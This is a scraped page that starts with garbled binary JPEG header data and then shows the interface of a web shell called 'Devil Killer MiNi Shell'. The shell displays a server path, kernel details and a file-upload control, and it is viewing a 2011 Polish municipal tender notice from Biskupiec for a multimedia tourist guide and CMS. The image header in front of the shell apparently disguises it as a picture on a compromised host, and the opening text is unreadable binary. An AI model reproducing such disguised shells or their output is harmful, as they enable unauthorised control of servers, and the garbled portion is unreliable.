JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110606/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110606/157869-N-2011.html

<p class="kh_header"><b>Biskupiec: Opracowanie Multimedialnego Przewodnika po Gminie i Mieście Biskupiec oraz atrakcjach Warmii i Mazur.</b><br>
<b>Numer ogłoszenia: 157869 - 2011; data zamieszczenia: 06.06.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Biskupiec , al. Niepodległości 2, 11-300 Biskupiec, woj. warmińsko-mazurskie, tel. 089 7150110, faks 089 7152437.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.biskupiec.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie Multimedialnego Przewodnika po Gminie i Mieście Biskupiec oraz atrakcjach Warmii i Mazur..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> OPIS PRZEDMIOTU ZAMÓWIENIA Opracowanie kreatywne i graficzno-techniczne Multimedialnego Przewodnika po Gminie i Mieście Biskupiec oraz atrakcjach Warmii i Mazur w niegorszych niż opisane technologiach i technikach wykonania tj. 1.Opracowanie szczegółowe grafiki i tekstu trójjęzycznego przewodnika w wersji polsko-angielsko-niemieckiej papierowej wersji Przewodnika p.t.: KRAJOBRAZ PEŁEN MOŻLIWOŚCI Przewodnik po mieście i gminie Biskupiec oraz atrakcjach Warmii i Mazur w formacie C5 162mm 229mm około 150 stron, z materiału nie gorszego niż kreda mat 115g na m2 plus oprawa klejowa ze miękką okładką. 2. Opracowanie PR całego tekstu przewodnika zawierającego przy założeniu co najmniej potrójnej korekty redakcyjnej, obróbka graficzna dostarczonych przez Zamawiającego fotografii, obróbka PR opisów miejsc atrakcyjnych turystycznie dostarczonych przez Zamawiającego, dołączenie przez Wykonawcę informacji uzupełniających zarówno tekstu jak i zdjęć. 3. Zarówno wersja papierowa jak i elektroniczna mają zawierać jak najwięcej tzw. podrasowanych zdjęć, grafik, filmów i map to znaczy około 60procent-70procent całej zawartości wersji papierowej i około 50procent-60procent całej zawartości wersji elektronicznej. 4. Przygotowanie do druku, CTP, skład i druk w pełnym kolorze 4plus4 w nakładzie 10 000 egzemplarzy, introligatornia zszycie, dostawa i rozładunek we wskazane przez Zamawiającego miejsca w Biskupcu i wskazanym terminie. 5. Tłumaczenie papierowej i elektronicznej wersji Przewodnika na język angielski przez tłumacza przysięgłego. 6. Tłumaczenie papierowej i elektronicznej wersji Przewodnika na język niemiecki przez tłumacza przysięgłego. 7. Kolportaż 500 sztuk papierowej wersji Przewodnika do punktów Informacji i Centrów Turystycznych oraz biur turystycznych na terenie Polski, a w szczególności na terenie województw: Mazowieckiego, Wielkopolskiego, Śląskiego, Lubelskiego, Warmińsko Mazurskiego. 8. Szczegółowe opracowanie map z atrakcjami na terenie Miasta i Gminy Biskupiec oraz okolicznymi atrakcjami na terenie Warmii i Mazur np. Św. Lipka, Wilczy Szaniec, zamek w Olsztynie itp. wraz z dołączeniem ich do papierowej i elektronicznej wersji Przewodnika. 9. Opracowanie szczegółowe grafiki i tekstu trójjęzycznego przewodnika w wersji polsko-angielsko-niemieckiej elektronicznej wersji Przewodnika p.t. KRAJOBRAZ PEŁEN MOŻLIWOŚCI Przewodnik po mieście i gminie Biskupiec oraz atrakcjach Warmii i Mazur stanowić będzie zakładkę na stronie internetowej Zamawiającego www.biskupiec.pl 10. Opracowanie PR całego tekstu elektronicznej wersji Przewodnika przy założeniu co najmniej potrójnej korekty redakcyjnej, obróbka graficzna dostarczonych przez Zamawiającego fotografii, obróbka PR opisów miejsc atrakcyjnych turystycznie dostarczonych przez Zamawiającego, dołączenie przez Wykonawcę informacji uzupełniających zarówno tekstu jak i zdjęć. 11. Elektroniczna wersja Przewodnika musi zawierać wszystkie informacje zawarte w wydawanym przewodniku p.t.: KRAJOBRAZ PEŁEN MOŻLIWOŚCI Przewodnik po mieście i gminie Biskupiec oraz atrakcjach Warmii i Mazur i musi być bogatsza i bardziej szczegółowa niż wersja papierowa oraz uzupełniona o informacje graficzne, mapy i opisy które nie mogły być zamieszczone bądź nie zmieściły się w papierowej wersji Przewodnika. 12. Elektroniczna wersja Przewodnika musi zapewnić przejrzyste, łatwe i bezpłatne korzystanie ze wszystkich informacji zawartych na stronie ich łatwe i bezpłatne pobieranie oraz bezpłatne drukowanie dowolnego zakresu wszystkich informacji i grafik. 13. Kreacja i szczegółowe opracowanie graficzne i informatyczne zakładki na stronie Zamawiającego www.biskupiec.pl wraz z integracją ze stroną www.biskupiec.pl multimedialnego przewodnika elektronicznego po Gminie i Mieście Biskupiec wykorzystującego najbardziej zaawansowane technologie Internet, telefonia komórkowa i GPS wraz z instrukcjami jak z ich korzystać, jak pobierać, drukować oraz jego wdrożenie i uruchomienie. Zakodowanie pocięcie zaakceptowanych przez Zamawiającego szablonów graficznych do standardu XHTMLnaCSS. 14. Konfiguracja i wdrożenie systemu CMS. Wypełnienie treścią serwisu teksty, grafika. Szczegółowe opracowanie CMS do obsługi i zarządzania treścią strony przewodnikowej zawierające m.in. możliwość edytowania położenia zdjęć, opisu atrakcji turystycznych, dodawania samodzielnego hoteli, restauracji itp. oraz jego wdrożenie wraz z bezpłatnymi, po stronie Zamawiającego, licencjami użytkownika,administratora co najmniej 2 licencje na czas trwałości projektu oraz bezpłatnym, po stronie Zamawiającego, na czas trwałości projektu serwisem i miejscem serwerowym oraz zakupem domeny wraz z hostingiem leżące po stronie Wykonawcy. 15. Hosting internetowej wersji Przewodnika. Wdrożenie na dowolnym innym zakupionym przez Wykonawcę przestrzeni dyskowej na serwerze obsługującym technologię CMS. Bez kosztów utrzymania na serwerze przez okres trwałości projektu. 16. Podstawowe funkcjonalności systemu CMS to m.in. obsługa poziomów dostępu dla użytkowników, tworzenie i edycja w ramach serwisu artykułów, newsów, zarządzanie i edycja galeriami zdjęć itd. Technologia PHPplusmySQLplusJSqueryJavaScript plusAJAXplusxHTML. Licencja bezterminowa na korzystanie w ramach jednej organizacji. Prosta archiwizacja baz danych i całego serwisu. 17. Przygotowana strona www powinna zawierać Informacje o których mowa w punkcie 38. mapy bazy danych, ciekawostki, ogłoszenia, dane kontaktowe, linki do stron Zamawiającego, galerię zdjęć, możliwość wysyłania newslettra,biuletynu, wyszukiwarkę haseł i pojęć przedstawionych na stronie www, mapę strony 18. Przygotowana strona powinna spełniać następujące parametry technologia XHTLM 1.0, PHP, CGI, SQL, JAVASCRIPT, preferowane rozwiązania oparte na OPENSOURCE oraz flash 8.0 lub wyższe z odpowiednią detekcją wersji flash, 19. dokonanie tłumaczenia treści na stronę WWW, 20. umieszczenie strony www na serwerze Wykonawcy; 21. dostawa przejrzystego, funkcjonalnego systemu CMS Content Management System równa się System Zarządzania Treścią, tj. zestawu aplikacji internetowych, wyposażonego w polski interfejs, pozwalającego na samodzielne, bieżące zarządzanie treścią i grafiką oraz ich układem, wymianę szablonów graficznych w trzech wersjach językowych polskiej, angielskiej i niemieckiej, przygotowanie i publikację treści w języku polskim, angielskim i niemieckim, bieżącą aktualizację i rozbudowę strony przez osoby posiadające podstawowe umiejętności obsługi komputera, poprzez m.in. tworzenie i dodawanie nowych działów i podstron, nowych szablonów, nowych załączników, publikowanie materiałów promocyjnych w programach Word, Excel, Adobe oraz materiałów graficznych i multimedialnych, itp., zmianę koncepcji graficznej strony poprzez wprowadzanie do systemu szablonów graficznych, tworzenie szablonów stron w zakresie strukturalnym, tj. rozmieszczenie poszczególnych elementów na stronie oraz w zakresie graficznym, tj. odpowiednie uporządkowanie obiektów graficznych na stronie obsługa tworzenia szablonu może zakładać pewien poziom wiedzy informatycznej Administratora Systemu, dodawanie nowych działów i podstron oraz modyfikowanie i usuwanie już istniejących w sposób intuicyjny i zapewniający bezpieczeństwo dla Administratora systemu, tworzenie dokumentów przy pomocy intuicyjnego edytora, niewymagające od redaktorów znajomości języka HTML edytor Wysiwyg, powinien umożliwiać redaktorom wygodny mechanizm przenoszenia treści ze sformatowanych w popularnych formatach biurowych plików tekstowych, jak również edycję wstawianego dokumentu w formacie HTML, wysyłanie newslettera,biuletynu, w formacie html, wyszukiwanie treści na stronie www, generowania dokumentów,stron w wersji do druku, obsługę z wielu przeglądarek internetowych, dostęp do systemu CMS z poziomu przeglądarki internetowej, możliwość bezpiecznej autoryzacji osób uprawnionych, logujących się do niego przy pomocy przeglądarki internetowej, równoczesną obsługę przez minimum trzy osoby, przyznawanie uprawnień dostępu na zróżnicowanych poziomach: Administratora systemu CMS - osobę odpowiedzialną za zarządzanie całym systemem, w tym tworzenie, edytowanie, usuwanie, publikowanie treści, grafik, załączników, działów, podstron, dodawanie i usuwanie użytkowników i nadawanie im praw dostępu, Redaktora - osobę odpowiedzialną za tworzenie, edytowanie, usuwanie, publikowanie treści, grafik, załączników, Osobę wprowadzającą dane - osobę odpowiedzialną za tworzenie, edytowanie, usuwanie, grafik, załączników bez prawa ich publikacji, tworzenie statystyk zarówno dla całej strony www, jak i poszczególnych jej działów i podstron przynajmniej: ilość wejść na stronie, ilość indywidualnych użytkowników, rodzaj używanej przeglądarki, lokalizacja użytkowników na podstawie adresu IP, inne zewnętrzne tzn. dotyczące aktywności zewnętrznych użytkowników, jak i wewnętrzne dotyczące aktywności administratorów i redaktorów oraz innych osób z zespołu redaktorskiego każda strona powinna mieć swoją historię edycji, Zamawiający dopuszcza wykorzystanie systemu Google Analytics automatyczne udostępnianie strony www w wersji angielskiej jeśli internauta wchodzi na stronę spoza terenu Polski na podstawie ustawień systemowych i języka przeglądarki tworzenie i zarządzanie repozytorium plików dostęp do plików umieszczanych na stronie www, tj. możliwość dodawania nowych, usuwania zbędnych plików, a także podmiany plików, które powinny być gromadzone w sposób pozwalający na swobodne ich przeglądanie, katalogowanie i sortowanie, niezawodny, bezpieczny i nieprzerwany dostęp do strony www, niezawodny, automatyczny system archiwizowania bazy danych 22. udostępnienie strony www w publicznej sieci internet osobom trzecim od dnia odbioru strony www przez Zamawiającego, pod adresem domeną wskazaną przez Zamawiającego, zapewniające jednakową czytelność strony www w przeglądarkach IE 7,8,9beta, FireFox 3, Opera 10.0, Safari 3.0, Chrome 10 i wyższe; 23. dostarczenie instrukcji obsługi CMS; 24. dostarczenie instrukcji konfiguracji CMS; 25. przeszkolenie w obsłudze CMS 3 osób wskazanych przez Zamawiającego - szkolenie zostanie przeprowadzone w Biskupcu, z wykorzystaniem infrastruktury znajdującej się w posiadaniu Zamawiającego po odbiorze systemu CMS przez Zamawiającego; 26. udostępnienie CMS wskazanym przez Zamawiającego osobom; 27. świadczenie usług serwisu CMS: udzielanie porad telefonicznych osobom wskazanym przez Zamawiającego w zakresie obsługi CMS porady udzielane będą w dni robocze tj. od poniedziałku do piątku, w godzinach 8.00 - 15.00 w okresie dwóch miesięcy od dnia odbioru strony www i sytemu CMS przez Zamawiającego, interwencja na usterki i błędy ujawnione w toku eksploatacji systemu CMS - nieprawidłowości w działaniu jednej lub wielu funkcji CMS, w od dnia odbioru strony www i sytemu CMS przez Zamawiającego do 31 grudnia 2013 r., w terminie nie późniejszym niż następnego dnia roboczego od momentu zgłoszenia błędu. Usuwanie usterek w najbliższym możliwym terminie, nie później niż w terminie 1 tygodnia. 28. hosting przygotowanej strony www na serwerze własnym Wykonawcy o parametrach minimalnych: pojemność serwera - 30GB, roczny pakiet transferu: min. 900GB, bazy danych: SQL POSTGRESQL, Skrypty: PHP CGI PERL itp. dostęp do serwera z zewnątrz: SSL SSH SFTP FTP, archiwizacja danych raz na dobę, backup serwera co 24h 
29.	przeniesienie autorskich praw majątkowych do strony oraz tłumaczeń zrealizowanych na potrzeby strony, a także użytych do jego wykonania materiałów, na polach eksploatacji określonych w paragrafie 8  umowy, której wzór stanowi Załącznik do niniejszego SIWZ
30.	udzielenie licencji dla systemu CMS, nieograniczonej czasowo i terytorialnie, na warunkach określonych w e wzorze umowy, której wzór stanowi Załącznik do niniejszego SIWZ.

31. Szczegółowe opracowanie projektu graficznego tras turystycznych interaktywnych zakładającego, że po naciśnięciu na interesujący nas obiekt pojawi się jego szczegółowy opis wraz ze zdjęciami, a po wejściu w dodatkowe menu - np. profil trasy rowerowej - turysta będzie mógł sprawdzić jakie ciekawe obiekty znajdują się na trasie, sprawdzi ile spali kalorii oraz będzie mógł dokładnie zaplanować swoją wycieczkę po Gminie i Mieście Biskupiec oraz Warmii i Mazurach. Długość tras musi wynieść nie mniej niż 300 km po Gminie i Mieście Biskupiec i objąć co najmniej 150 obiektów w Gminie i Mieście Biskupiec. Należy zintegrować je z przewodnikiem elektronicznym, wprowadzić wszystkie treści na stronę w zakładkę, opracować ślady GPS tras, opracować opisy obiektów i atrakcji turystycznych, wraz ze zdjęciami, profilami itp. 32. Opracowanie 5 Panoram 3D wskazanych przez Zamawiającego miejsc na terenie Gminy lub miasta Biskupiec oraz wprowadzenie wszystkich treści na stronę w zakładkę. 33. Szczegółowe opracowanie scenariusza i nagranie promocyjnego filmu o Gminie Biskupiec - czas trwania filmu do 1,5 min i wprowadzenie wgranie filmu wszystkich treści na stronę w zakładkę. 34. Szczegółowe opracowanie warstw Map miasta i okolic w wersji na telefon komórkowy z wykorzystaniem Google Maps - wraz z wprowadzeniem wszystkich treści na stronę w zakładkę umożliwiające ich darmowe pobranie na telefon. Opracowanie map miast i okolic na GPS wraz z darmowym po stronie Zamawiającego oprogramowaniem, ewentualnymi licencjami i instrukcją na stronie. 35. Szczegółowe opracowanie 3 tras turystycznych jako warstwa do aplikacji na komórkę wraz z wprowadzeniem wszystkich treści na stronę w zakładkę umożliwiające ich darmowe pobranie na telefon. Opracowanie i zamieszczenie śladów GPS tras wraz z darmowym po stronie Zamawiającego oprogramowaniem, ewentualnymi licencjami i instrukcją na stronie. 36. zakup i instalacja infokiosku wewnętrznego umieszczonego na korytarzu pierwszego piętra Urzędu Miejskiego w Biskupcu o parametrach: wolnostojąca, wandaloodporna, estetyczna obudowa ekran LCD o wielkości min 17 cali zabezpieczony przed uszkodzeniami mechanicznymi klawiatura oraz urządzenie wskazujące zabezpieczone przed uszkodzeniami mechanicznymi komputer z dedykowanym oprogramowaniem pozwalającym na korzystanie z Internetu oraz prezentację danych za pomocą materiałów audio i wideo o jakości materiałów DVD lub lepszych urządzenie przystosowane do użytkowania przez osoby niepełnosprawne Gwarancja podstawowa 24 miesiące Certyfikaty CE, ISO 14001 integracja ze stroną www.biskupiec.pl Dopuszcza się zastąpienie klawiatury oraz urządzenia wskazującego dotykowym ekranem 37. System Wizualnej Informacji Turystycznej w tym zakup i montaż w Punkcie Informacji Turystycznej zlokalizowanej przy Pl. Wolności 5c w Biskupcu następujących elementów Systemu nie gorszych niż: A. 2 ekrany 42cali z wąską ramką o parametrach nie gorszych niż: kontrast co najmniej 60000:1 i czas reakcji nie więcej niż 4ms wraz z montażem w witrynie Punktu Informacji Turystycznej. Monitory muszą gwarantować czytelny obraz w nasłonecznionej witrynie. B. 2 konwerterów pozwalających na dzielenie obrazu komputera na dodatkowe ekrany nie gorszych niż Multi View Grand. C. Laptop zarządzający treścią z możliwością podglądu, do sterowania i zarządzania informacją na monitorach wraz z oprogramowaniem. D. System musi pozwolić na dzielenie obrazu na dwa ww ekrany oraz możliwość podglądu na trzecim monitorze. E. System musi pozwalać na prezentację niezależnych treści na dwóch ekranach równocześnie. F. System musi umożliwiać prezentację filmów w jakości DVD lub lepszej, prezentacje Power Point lub inne. G. System nie gorszy niż Windows Home 38. Zakres informacji jakie w szczególności planuje się ująć w papierowej i elektronicznej wersji Przewodnika to m.in.: 1 Miasta i miejscowości 2 Jeziora i rzeki 3 Ulice, aleje, place 4 Centrum Prus 5 Granica Warmii szlak kapliczek i Mazur 6 Szlaki,trasy rowerowe 7 Szlaki, trasy kajakowe 8 Szlaki,trasy piesze 9 Szlaki, trasy konne 10 Szlaki,trasy turystyczne 11 Ścieżki edukacyjne 12 Mapa jeziora Dadaj głębokości, wskazanie najgłębszego miejsca 13 Zabytki 14 Bitwy, fortyfikacje, muzea, bunkry 15 Naj najdłuższe, najgłębsze, najwyższe, 16 Grody, grodziska itp. 17 Wały 18 Stanowiska archeologiczne, wykopaliska, znaleziska itp. 19 Dwory, pałace itp. 20 Parki 21 Punkty widokowe, wieże widokowe 22 Schroniska młodzieżowe 23 Kempingi, pola namiotowe 24 Najwyższy najniższy punkt w Gminie Biskupiec 25 Cmentarze, cmentarzyska, pojedyncze groby uczeń Matejki, siostry Lubomirskie itp. , kurhany itp. 26 Kościoły, kaplice 27 Kapliczki 28 Zapory, śluzy, wiadukty 29 Pomniki 30 Pomniki przyrody 31 Rezerwaty, użytki ekologiczne, obszary chronione itp. 32 Fauna i flora w tym: ryby i grzyby 33 Ciekawostkinp. architektoniczne, legendy, rękodzieło, itp. etnografia itp. 34 Cykliczne imprezy w tym: WARMIŃSKA UCZTA PIEROGOWA, Gra Straszydła, Misterium Paschalne itp. 35 Puby, hotele, pensjonaty, restauracje, gospodarstwa agroturystyczne, ośrodki wypoczynkowe terenie Gminy Biskupiec itp. 36 Stadniny Jazda konna 37 Parkingi 38 Lotniska 39 PKP PKS 40 Bankomaty i banki 41 WC 42 Biblioteki 43 Szpital Policja Straż pożarna Straż Miejska 44 Stacje benzynowe 45 Kalendarium imprez corocznych 46 Taxi na terenie Gminy Biskupiec 47 Szkoły, przedszkola na terenie Gminy Biskupiec 48 Informacja Turystyczna 49 Biskupiecki Dom Kultury 50 Kino 51 Urzędy pocztowe 52 Hot spoty 53 Przystanie Wypożyczalnie sprzętu 54 Place zabaw 55 SPORT Stadiony, boiska, Orlik, bule francuskie, tenis itp. 56 Sławni i słynni mieszkańcy Biskupca Pietraszewski itp. 57 Telefony, e-maile, faxy 58 Mapy turystyczne, plany niektórych miast, mapy jezior z ogólną charakterystyką zawierające m.in. głębokości, wskazanie najgłębszego punktu, najlepsze miejsca do połowów, występujące gatunki ryb oraz trasę dojazdu itp. Wykonawca udzieli roczną gwarancję na wykonane prace. Wykonawca udzieli 24 miesięcznej gwarancji na wyposażenie informatyczneZamawiający nie zamierza zawrzeć umowy ramowej. Zamawiający nie przewiduje ustanowienia dynamicznego systemu zakupów..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie, w okresie 3 lat od udzielenia zamówienia podstawowego, dotychczasowemu wykonawcy usług  zamówień uzupełniających, stanowiących nie więcej niż 20 % wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień zgodnych z przedmiotem zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.34.00.00-9, 79.96.00.00-1, 79.82.25.00-7, 79.55.20.00-8, 71.35.40.00-4, 79.82.30.00-9, 79.82.20.00-2, 79.53.00.00-8, 79.82.40.00-6, 79.34.21.00-4, 72.21.20.00-4, 72.21.25.00-4, 72.21.23.16-7, 92.11.12.10-7, 30.23.13.00-0, 30.21.31.00-6, 72.41.50.00-2, 39.29.40.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.07.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający żąda wniesienia wadium w wysokości 5 500,00 zł brutto (słownie: pięć tysięcy pięścest,00/100 złotych)
2. Wadium musi być wniesione przed upływem terminu składania ofert, wskazanego w SIWZ.
3. Wadium może być wnoszone w jednej lub kilku następujących formach: 
1) pieniądzu; 
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym; 
3) gwarancjach bankowych; 
4) gwarancjach ubezpieczeniowych; 
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.4)). 
4.Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy wskazany przez zamawiającego tj. Bank Pocztowy S.A. placówka w Biskupcu 76 1320 1104 3132 3622 2000 0003.
5.Wadium wniesione w pieniądzu zamawiający przechowuje na rachunku bankowym. 
6.Jeżeli wadium zostanie wniesione w pieniądzu, przelewem, Wykonawca dołącza do oferty kserokopię wpłaty wadium z potwierdzeniem dokonanego przelewu. Na poleceniu przelewu należy wpisać: Opracowanie Multimedialnego Przewodnika po Gminie i Mieście Biskupiec oraz atrakcjach Warmii i Mazur.
W pozostałych przypadkach (p.3.2.-3.5 niniejszego rozdziału) wymagane jest dołączenie oryginału dokumentu wystawionego na rzecz Zamawiającego. 
7.W przypadku wnoszenia wadium przelewem na rachunek bankowy, o jego wniesieniu w terminie decydować będzie data wpływu (data i godzina) środków na rachunek bankowy Zamawiającego.
Okoliczności i zasady zwrotu wadium, jego przepadku określa art. 46 ustawy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje opisu sposobu dokonywania oceny spełniania tego warunku, poza wymogiem przedstawienia oświadczenia - załącznika 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje opisu sposobu dokonywania oceny spełniania tego warunku, poza wymogiem przedstawienia oświadczenia - załącznika 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje opisu sposobu dokonywania oceny spełniania tego warunku, poza wymogiem przedstawienia oświadczenia - załącznika 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje opisu sposobu dokonywania oceny spełniania tego warunku, poza wymogiem przedstawienia oświadczenia - załącznika 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
